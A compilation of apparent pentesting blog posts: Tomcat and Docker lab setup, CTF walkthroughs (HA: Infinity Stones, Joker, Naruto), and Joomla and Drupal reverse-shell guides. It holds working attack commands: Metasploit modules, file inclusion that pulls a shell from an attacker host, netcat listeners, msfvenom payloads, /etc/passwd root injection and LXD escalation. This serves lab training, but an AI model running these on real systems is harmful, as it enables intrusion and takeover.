Requirements:

Server/Victim Machine: Ubuntu 18.04

Pentesting Machine: Kali Linux

Table of Content

· Introduction of Apache Tomcat

· Installation of Apache Tomcat

· Install apache2

· Install java jdk

· Download tomcat manager

· Tomcat manager configuration

· Create tomcat user and group

· Assign permission

· Create a systemd Service File

· Update firewall to allow tomcat

· Configure Tomcat Web Management Interface

· Access the Web Interface

· Exploiting Apache Tomcat

Introduction of Apache Tomcat

What is Apache Tomcat?

Apache Tomcat which is also known as Tomcat Server is a Java-Based HTTP Web Server. It implements Java EE Specifications like Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket. It is an open-source software made by developers at Apache Software Foundation. Apache has been released as early as 1999. That makes Apache Tomcat 20 years old at the time of publication of this article.

Apache Tomcat in its simplest configuration runs in a single operating system process. This process is commonly known as the Java virtual machine (JVM). This allows Apache Tomcat platform independent as well as secure as compared to others.

Installation of Apache Tomcat

INSTALL APACHE2 AND JAVA

Let’s start with apache tomcat installation but before that you should go with below command.

apt update

apt install apache2

Now, Apache Tomcat needs Java to be installed so that the Java Application code can be executed on the server. To make this possible, installed the Java Development Kit.

apt-get install default-jdk

CREATE USER AND GROUP

To run the tomcat as an unprivileged user, create a group and a new user named as tomcat. We have created the user in /opt because we are going to install tomcat in that directory. We don’t need the tomcat user to use the shell so we will be using the -s parameter to set /bin/false shell. By doing this authentication will get disabled for the tomcat user.

groupadd tomcat

cd opt

mkdir tomcat

useradd -s /bin/false -g tomcat -d /opt/tomcat tomcat

DOWNLOAD TOMCAT MANAGER

Now, we are going to download the apache tomcat Package from here. After downloading it’s time to extract the package it inside /opt directory and move forward.

sudo tar xzvf apache-tomcat-9.0.24.tar.gz -C /opt/tomcat --strip-components=1

ASSIGN PERMISSIONS

Now we are going to use the chgrp command to give the ownership of the tomcat directory to the tomcat group.

cd /opt/tomcat

chgrp -R tomcat /opt/tomcat

To allow the tomcat group user to perform the read and execute operation change permission for /conf file as given below.

chmod -R g+r conf

chmod g+x conf

Also give ownership to the tomcat group user for directories like: webapp/, work/, temp/ and logs/.

chown -R tomcat webapps/ work/ temp/ logs/

We want Apache Tomcat to be run as a service and for that, we will have to set up a system service. To do this, we are going to require the location of the Java Installation. For this, we will be running the command given below.

update-java-alternatives -l

CREATE A SYSTEMD SERVICE FILE

To create a system service file, open the tomcat.service file in the /etc/systemd/system directory using nano editor.

nano /etc/systemd/system/tomcat.service

Now append the following content and modify the JAVA_HOME as shown below

 [Unit]

Description=Apache Tomcat Web Application Container

After=network.target

[Service]

Type=forking

Environment=JAVA_HOME=/usr/lib/jvm/java-1.11.0-openjdk-amd64

Environment=CATALINA_PID=/opt/tomcat/temp/tomcat.pid

Environment=CATALINA_HOME=/opt/tomcat

Environment=CATALINA_BASE=/opt/tomcat

Environment='CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC'

Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom'

ExecStart=/opt/tomcat/bin/startup.sh

ExecStop=/opt/tomcat/bin/shutdown.sh

User=tomcat

Group=tomcat

UMask=0007

RestartSec=10

Restart=always

[Install]

WantedBy=multi-user.target

Now Save this file. This will make tomcat a service.

Reload the systemd daemon to register our newly created tomcat service. If everything is done done correctly, we will able to run, stop and see the status of the Apache Tomcat as a service.

sudo systemctl daemon-reload

sudo systemctl start tomcat

sudo systemctl status tomcat

UPDATE FIREWALL TO ALLOW TOMCAT

It’s time to allow the tomcat via our firewall, Since Ubuntu has the ufw installed and set up by default. Apache Tomcat generally uses the post 8080 to receive requests from users.

sudo ufw allow 8080

Execute below command to start tomcat starts automatically whenever the machine boots up.

sudo systemctl enable tomcat

CONFIGURE TOMCAT WEB MANAGEMENT INTERFACE

At this stage, if you will browse the Server IP with the port 8080, you will be greeted with an Apache Tomcat Page. But if you will click on the links to the Manager App, you will get Access Denied. This means that you haven’t yet set up the Tomcat Web Manager Interface. So, let’s do that and complete the Apache Tomcat Setup.

Open the file using the nano editor and make the following changes as shown in the image given below.

sudo nano /opt/tomcat/conf/tomcat-users.xml

admin" password="password" roles="manager-gui,admin-gui"/>

You can change the username and password as per your choice. We will save and close the editor after making appropriate changes.

By default, Apache Tomcat restricts access to the Manager and Host Manager apps to connections coming from the server. As we are installing Tomcat for a remote machine, we will probably want to alter this restriction. To change the restrictions on these, we will be editing these context.xmlfiles.

sudo nano /opt/tomcat/webapps/manager/META-INF/context.xml

Inside, comment out the IP address restriction to allow connections from anywhere. Alternatively, if you would like to allow access only to connections coming from your own IP address.

sudo nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

We do the same thing with the host-manager file. To allow access to Host Manager too.

saved the changes restart the tomcat service.

systemctl restart tomcat

ACCESS THE WEB INTERFACE

We got to the interface by entering your server’s domain name or IP address followed on port 8080 in our browser. Now we will try to see if the Manager and Host Manager interfaces are working. Click the Buttons highlighted in the image.

The Login authentication page will pop-up as expected, we enter the credentials that we created earlier.

Upon verification of the credentials, Apache Tomcat lands us to this Tomcat Virtual Host Manager Interface. From this page, you can add virtual hosts to serve your applications. This concludes our Apache Tomcat Setup.

Exploiting Apache Tomcat

Now that we have successfully installed the Apache Tomcat Framework, Let’s do its Penetration Testing. We are going to use Metasploit for exploiting the Apache Tomcat.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

use exploit/multi/http/tomcat_mgr_upload

msf5 exploit(multi/http/tomcat_mgr_upload) > set target 2

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.0.23

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf5 exploit(multi/http/tomcat_mgr_upload) > set httpUsername admin

msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword password

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

As result, you can observe that we have the meterpreter session of the target machine.

meterpreter > shell

Learn multiple way to exploit tomcat manager from here.

Docker services are extensively used in IT operations, so it is very important that you start learning from docker basics. In this article, we will cover the installation and setup of the docker, along with its specific uses.

Learn web application in

Table of Contents

· Introduction to docker

· Docker and its terminology

· Advantages of docker

· Installation and usage

Introduction to Docker

Now, to work with docker you will need to install docker engine in your host. It is a foundation to the docker system, which basically runs as client-server application. Its daemon process is referred to as server and the command line interface is referred to as client and REST API is used to create communication link between client and server.

In Linux, docker client interacts with docker server through the CLI. Here, terminal is docker client and docker host will run the docker daemon.

Whereas in windows, to work with docker, we need to install docker toolbox component in docker host in order to set up environment on your Windows or iOS.

Docker and its terminology

When working with docker, one should be familiar with the following terms :

· Docker Hub:It is a repository which available to all who uses docker through cloud. Through docker hub, one can create, store, test, pull and share container images.

· Docker Images : Docker image acts as a template in order to create container. Build command is used to create docker images. Docker images makes it easy.

· Docker containers : Containers are said to be isolated environment provided to the docker image and its dependencies so that it can run independently. The focus of deploying a container is to update or repair an application or just simply modify it and share it. When working on an image, container lets you create a layer of a single command used which make it easy to modify it, or upgrade or degrade is version.

· Docker Registry : All the docker images are stored in docker registry. User can either can have local registry on their system or they can have a public one like docker hub.

Advantages of docker

· Easy to use

· Faster scaling systems

· Better software delivery

· Flexibility

· Provides isolated environment

· Supports software defined networking

· Rapid deployment

· Security

Installation and usage

To install docker, simply open the terminal of Linux and type the following command :

apt install docker.io

To check the version one can use the following command :

docker –version

Further you can run help command in docker, which is as following, to know all the options that dokcer provides at your service.

docker --help

Once the docker is up and running, you can run or pull any image in your docker container. For instance, here we have run hello-world. When you run the following command, it will first check your local repository; if the image is not available there then it will pull it from docker hub.

docker run hello-world

As we have explained before, CLI works as a client, so directly from the terminal you can search for any image you like. Like, here we have searched for ubuntu. One thing to remember here is that image with more stars will be the most authentic one.

docker search ubuntu

Once you find your image, you can pull it into your container with the following command :

docker pull ubuntu

Now to check how many images you have in your docker, simply type the following command :

docker images

To remove any image, use the following command :

docker rmi hello-world

Here, rmi refers to remove image.

Now, in the details given by ps command, you can see that the name of our ubuntu image is adoring curie, which is a random name generated by docker for every image. To, rename this name we can use following command :

docker run -it -d –name “ignite” ubuntu

And you can confirm with the ps command again that the name has been changed as shown in the image below :

The docker attach command permits you to attach to a running container using the container ID or name, you can use one instance of shell only though attach command. But if you crave to open new terminal with new instance of container's shell, we just need run docker exec.

docker attach ignite

docker exec -i -ignite /bin/bash

Using the ps command we can see all the processes that are running in docker. There, for this, type :

docker ps

docker ps -a

To stop the running container, you can use stop command as shown in the below image, we have stopped the container and its process which can be confirm with the help of process command. As result there should be no running process for ignite.

docker stop

If you can export the docker filesystem as a tar archive, use export command to compress the filesystem of a docker container into tar. The export commands fetch the whole container like a snapshot of a regular VM.

docker export | gzip > {path for tar} filename.tar

It will give you a flat .tar archive containing the filesystem of your container.

When you will export container as tar file, the file has hash value which can read as:

cat {path of exported tar file} |docker import – newignitelab

In order to save the image of container which you can upload on other docker use save command. You can subsequently load this "saved" images into a new docker instance and create containers from these images.

docker save | gzip > {path for tar} filename.tar

docker load -i /home/raj/docker/igniteimage.tar

In order to clear all image and or stop all process of the container. It will pack the layers and metadata of all the chain required to build the image.

docker rm -f $(docker ps -aq)

To learn how to setup vulnerable web application setup using docker from here.

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

· Scanning Network

o Netdiscover

o Nmap

· Enumeration

o Browsing HTTP Service

o Performing Directory Bruteforce

· Exploitation

o LFI

o Create PHP reverse shell

o Reading /etc/passwd file

o Getting a reverse connection

o Spawning a TTY Shell

· Privilege Escalation

o Writable etc/passwd File

Walkthrough

Scanning Network

Firsts of all we try to identify our target and for this use the following command:

netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.104

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:

http://192.168.1.104

It opened a webpage as shown in the above image. Here we found the bhaskara page, so now we opened and found an information webpage there as shown in the image below:

http://192.168.1.104/bhaskara.html

As convention we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.

Now we got to decode it. To do this we will be use the combination of the echo command and the base64 -d.

echo "L2JoYXNrYXJh" 1 base64 -d

After decoding the base64 encoded text we get "/bhaskara". This seems a hint that there might be a directory named bhaskara.

So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.

Now in order to crack this file we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.

python true.py bhaskara > hashes

john hashes --show

Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image.

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’

It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let's move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.

dirb http://192.168.1.104

dirb http://192.168.1.104 -X .php

We went into the /img directory. Here we found an image called aryabhata.jpg.

We will download the aryabhata.jpg and opened it.

Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.

As we couldn't find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag.

steghide extract -sf aryabhata.jpg

cat flag.txt

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in out drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.

192.168.1.104/connect.php?file=/etc/passwd

We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one liner showed below.

nano shell.php

python -m SimpleHTTPServer

We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.

nc -lvp 1234

After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.

192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php

Upon execution, the shell gave us a session the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.

netstat -antp

We tried to login in the MySQL database as root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.

mysql -u root

show databases;

use flag;

show tables;

select * from flag;

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.

ls -la /etc/passwd

openssl passwd -1 -salt user3 pass123 $1$user3$rAGRVf5p2jYTqtq0W5cPu/

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.

echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash'>>/etc/passwd

tail /etc/passwd

su raj

Password: pass123

cd /root

cat final.txt

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}

Today we are going to solve our Boot to Root challenge called “HA: Joker” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find Root Flag on the Target Machine.

Penetration Methodologies

· Scanning Network

o Netdiscover

o Nmap

· Enumeration

o Browsing HTTP Service

o Performing Directory Brute force

o Performing Bruteforce on Joomla

· Exploitation

o Exploiting the Joomla

o Getting a reverse connection

o Spawning a TTY Shell

· Privilege Escalation

o LXD

Walkthrough

Scanning Network

First of all, we try to identify our target. We did this using the netdiscover command. It came out to be

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.101

Enumeration

With the help of the scan, we now know that port number 22, 80 and 8080 are open with the service of SSH, HTTP respectively. Now that port 80 is open, so we opened the target IP address in our browser as shown in the following image:

http://192.168.1.101

This gave us a collection of Joker Quotes from his appearance over time in the comics and the movies. We also inspected the source code of this webpage, it was also riddled with the commented joker quotes.

As we couldn’t find anything of much use on the webpage hosted on the port 80, we decided to enumerate the service running on the port 8080. This was surprisingly only accessible to an authorized user with proper credentials as shown in the image given below. It’s time to look for these credentials.

http://192.168.1.101:8080

Now while we were busy browsing the webpages, we also started a directory bruteforce scan using the dirb tool. We applied different variants of scans with different extensions. We got success with the .txt extension. We found the secret.txt.

dirb http://192.168.1.101/ -X .txt

Now that we have found the secret.txt file. To inspect this file, we decided to download the text file on our system using the wget command. After successfully downloading the text file, we opened the file using the cat command. It contained a conversation between Batman and our beloved Joker. Here there was a repeat mention of the word ‘rock’ this struck us as ‘rockyou.txt’ the famous bruteforce dictionary. Also, there was a mention of the ‘one of your 100 poor jokes’. It was a bizarre mention of the word 100. So what we accumulated from this was that the password for the panel at port 8080. Must be in the top 100 passwords of the Rockyou dictionary.

wget http://192.168.1.101/secret.txt

cat secret.txt

Now that we have formulated a plan to use the top 100 passwords from the rockyou.txt dictionary, it’s time to compile a smaller dictionary of those 100 passwords so as to make the bruteforce faster and lighter. To do this we are going to use the head command. From the head command, we are going to pass the parameter of 100 keywords and direct the output generated by this command in a text file using the greater than (>) symbol.

head -n 100 rockyou.txt > dict.txt

Now as this is a web application and we are required to perform a brute force, we are going to use the BurpSuite Application. For that, we are going to open the webpage hosted on the port 8080 and enter any random characters in the login panel and press the OK button after applying the burp proxy.

As we started the BurpSuite and clicked on the OK button after applying the proper proxy, and enabling the Intercept option on the BurpSuite, we are able to capture a request that was generated. Further on, we right-clicked on the request captured and selected the option “Send to Intruder”.

After Sending it to Intruder, we are going to check the Intruder tab for the transferred request. Here in the Intruder section, we are going to get into the Positions Tab. Here we select the Attack type to be Sniper. We will select the Authorization hash and Click on the Add Button on the right side.

After that, we move into the Payloads option. Now, here we are going to use the dictionary we created earlier. But we are supposed to add the username and password in this bruteforce. So we are going to modify the dictionary we created earlier by adding the username as ‘joker’ followed by a ‘:’. So that it might look like:

joker:password

Now as we can see that the authentication is Base64. So we will have to use the Payload Processing section to modify our bruteforce credentials as Base64 values. To do this we click on the Add button. Select the rule type as “Encode”. Further, choose the “Base64-encode” option and click on OK.

After applying the above-stated settings, we went back to the Positions Tab and Clicked on the “Start Attack Button”. The Bruteforce starts and gives the result. Here we are going to get a lot of 401 errors. But we will have to find the entry with the 200 code.

As this text is encoded in the Base64 Encryption. We converted it into the Plain Text. Upon conversion, it came out to be:

joker:hannah

We went back to the login panel and entered the username as ‘joker’ and password as ‘hannah’. This was a successful login. And we could see the Joomla Website as shown in the given image.

As this is a Joomla website, its login panel must be at /administrator. So we surfed that URL in our Browser. Here we got stopped by another login panel. After a brief searching over the internet, we found that the default credentials of Joomla are ‘joomla:joomla’. So, before trying anything else, we will be trying these login credentials.

Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the PHP reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below

After we got the shell, we saw that the shell that we got is an improper shell, so we used the python one-liner to convert it into a proper shell. After conversion, we ran the id command. We saw that this shell is of the user ‘www-data’. We saw that this user is a part of the lxd group. This could be our way to root.

python3 -c 'import pty;pty.spawn("/bin/bash")'

To learn the Lxd privilege escalation in detail, refer to this article: “Lxd Privilege Escalation”.

In order to take escalate the root privilege of the target machine, we will have to create an image for lxd. To that, we will first, Download build-alpine in the attacker machine (Kali Linux) through the git repository. After that, we will be traversing it into the lxd-alpine-builder directory and execute the script “build -alpine” that will build the latest Alpine image as a compressed file.

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

Now we will send the tar file to the target machine. We will be using the Python HTTP server for this transfer.

python -m SimpleHTTPServer

On the target machine, firstly we will be downloading the alpine image followed by importing an image for lxd. After that, we will be Initializing the image inside a new container.

wget http://192.168.1.107:8000/alpine-v3.10-x86_64-20191019_0712.tar.gz

lxc image import ./alpine-v3.10-x86_64-20191019_0712.tar.gz --alias myimage

lxc image list

Finally, we will be mounting the container inside the /root directory. Once inside the container, navigate to /mnt/root to see all resources from the target machine. After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag here and we found the final.txt. This concludes this Boot to Root Challenge.

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

cd /mnt/root/root

cat final.txt

This is our Walkthrough for “HA: Naruto” and this CTF is designed by Hacking Articles Team, hope you will enjoy this.

Book your tickets to The Konohagakure, and train under Master Jiraiya, Hokage Uzumaki, and Tsunade. Use your hacking skills to stop Orrochimaru and Rescue Sasuke. Hack this boot to root and get the title of “The Number One Hyperactive, Knucklehead Ninja”

Level:

You can download this lab from here.

Let’s Begin!!

Penetration Testing Methodologies

Scanning Network

netdiscover
Nmap

Enumeration

Browsing HTTP Service
Samba Client (Smb Client)

Exploiting

Drupal-Metasploit

Privilege Escalation

· Capabilities

Network Scanning

Firsts of all we try to identify our target and for this use the following command:

netdiscover

Now we will run an aggressive port scan using Nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.4

With the help of the scan, we now know that port number 80,22,139 and 445 are open with Apache, SSH and Smb service running.

Enumeration

Further, we started enumeration against the target machine and therefore we navigated to a web browser for exploring HTTP service. And we got a page of Naruto as shown below: -

Smbclient

Smbclient is a customer that can 'converse with' an SMB server. It offers an interface like that of the FTP program. It can perform activities like getting records from the server to the nearby machine, putting documents from the neighborhood machine to the server, recovering catalog data from the server.

We used the following command to view files in smbclient.

smbclient -L \\192.168.0.4

As we can observe with the help of smbclient we are able to view the shared folder and files of the victim’s machine. Moreover, we can use smbclient for sharing a file in the network. Therefore, we found a text file by name of uzumaki.txt which we downloaded into our machine by using the following command.

smbclient //192.168.0.4/Naruto

Then we used the cat command to open the text file and got a hint “Gara” as we saw that word is in double-quotes in the text file.

We tried this hint and opened it on the browser page where we got a Welcome page.

Exploitation

Now we will use our old friend Metasploit to exploit the Drupal Page we found earlier.

msf5 > use exploit/unix/webapp/drupal_restws_unserialize

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set rhosts 192.168.0.4

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set targeturi /gara

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set lhost 192.168.0.5

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > exploit

Booom!! Our favorite meterpreter session is all here, let’s go for Post enumeration.

After getting into the meterpreter session we used the “shell” command to get a shell on the target system. This came back to be an improper shell.

Now we used our python one-liner to invoke a proper shell on the target machine. After getting the shell we saw that the shell we got is of user “www-data”.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We will go for the post enumeration using the following command which shows us all the connections with their ports.

netstat -antp

If we check our local network static for TCP and UDP connections, we will see that there’s something running 8080 and even nmap doesn’t display anything for this. With the aid of the meterpreter, we have forwarded service port 8080 to our local host:8080.

portfwd add -l 8080 -p 8080 -r 127.0.0.1

Once we have forwarded the service over to our local machine then we can explore it the web browser as we have done here.

This will provide us with the following credentials:

User: yashika

Password: raj@123

Privilege Escalation

Now we got to do is run su command which will give all root permissions to that user and therefore we successfully logged in using the following credentials:

su yashika

raj@123

In Linux, files can be provided with a capability to access specific files majorly critical files with specific permissions only; like a script file can be provided with the capability to read ssh configuration files or /etc/shadow file which can be done using getcap so we will use the following command to find out the capabilities of the user and whether those capabilities are enabled or not:

getcap -r / 2>/dev/null

Now we tried to find files with sudo permission and found a text file in the home directory. We opened the file.

cd /root

cat final.txt

And so, we found our Hero: NARUTO (“The Number One Hyperactive, Knucklehead Ninja”)

Joomla is one of the popular Content Management System (CMS) which helps you to build your website. Joomla has gained its popularity by being user friendly as its complication free when during installation; and it is also pretty reliable. In this article, we learn how to get reverse shell of joomla.

As you can see in the image below, that the website is made in joomla. Now, that we have our joomla environment we start exploiting it.

The attack that we are going to show is categorises under post exploitation; which means one should have log in credentials of joomla. The URL of log in page of joomla will be consisted of ‘joomla/admministrator’ and here, enter username and password as shown in the image below :

Once you are logged in, go to extensions. A drop down menu will appear, from this menu select templates; just like it has been shown in the image belolw :

Implementing the above will show you the list of templates present in the website and so we will exploit one of them i.e. Beez3 details and files.

Once, you are in the template, go to index.php as shown in the image below :

This way you will able to edit index.php in the template as you can see in the image below :

Now, swap the code of index.php with the reverse shell code i.e. found in kali linux and add your ip and port in the code just like it has been shown in the image below :

Now, activate netcat to get a session with the following command :

nc -lvp 1234

Another way to get a reverse shell is by msfvenom, and for this type the following command :

msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

The above command will give you the malicious php code. Swap this code just like before and simultaneously start the multi/handler as shown in the image below :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 1234

exploit

These were the two ways to get reverse shell in joomla.

In this Post, you will learn how to test security loopholes in Drupal CMS for any critical vulnerability which can cause great damage to any website if found on any webserver. In this article you will learn how a misconfigured wep application can be easily exploit.

Remote code Execution: Remote Code Evaluation is a vulnerability vulnerability that occurs because of the unsafe handling of inputs by the server application or that can be exploited if user input is injected into a File or a String and executed by the programming language's parser or the user input is not sanitised properly in POST request and also when accepting query string param during GET requests.

Therefore a Remote Code Evaluation can lead to a full compromise of the vulnerable web application and also web server.

Let’s Begin!!

So the drupal is accessable through web broswer by exploring following URL:

http://192.168.10.117/drupal

And this open the default home page, to access the dash board you must have credential for login.

So, to access the user console, I used following creds.

Username:raj

Password:123

After accessing the admin console, it was time to exploit web application by injecting malicious content inside it. Directly writing malicious scripts as web content will not give us the reverse shell of the application but after spending some time, we concluded that it requires PHP module. We, therefore, move to install new module through Manage>Extend>List>Install new module.

You can download the PHP package for Drupal from the URL below and upload the tar file to install the new module.

https://www.drupal.org/project/php

To install php module upload the tar file that was downloaded.

So, when the installation is completed, we need to enable to added module.

Again, move to Manage > Extend >filters and enable the checkbox for PHP filters.

Now use the Pentest monkey PHP script, i.e. “reverse shell backdoor.php” to be injected as a basic content. Don’t forget to add a “listening IP & port” to get a reversed connection. Continue to change the “text format to PHP” and enable the publishing checkbox. Keep the netcat listener ON in order to receive the incoming shell.

When everything is set accordingly, click the preview button and you’ll get the reverse connection over the netcat.

Hence, we got the reverse connection of the host machine.

DC8: Vulnhub Walkthrough

HA : Wordy Vulnhub Walkthrough

Hack the Box Challenge: Baniston Walkthrough

Web Shells Penetration Testing

WordPress: Reverse Shell

Web Application Pentest Lab setup Using Docker

HA: Armour Walkthrough

Web Application Lab Setup on Windows

Misdirection 1: Vulnhub Walkthrough

bossplayersCTF 1: Vulnhub Walkthrough

Lxd Privilege Escalation

Hacker Fest: 2019 Vulnhub Walkthrough

LAMPSecurity: CTF6 Vulnhub Walkthrough

Apache Tomcat Penetration Testing Lab Setup

Docker Installation & Configuration

HA: ISRO Vulnhub Walkthrough

HA Joker Vulnhub Walkthrough

HA: Naruto Vulnhub Walkthrough

Joomla: Reverse Shell

Drupal: Reverseshell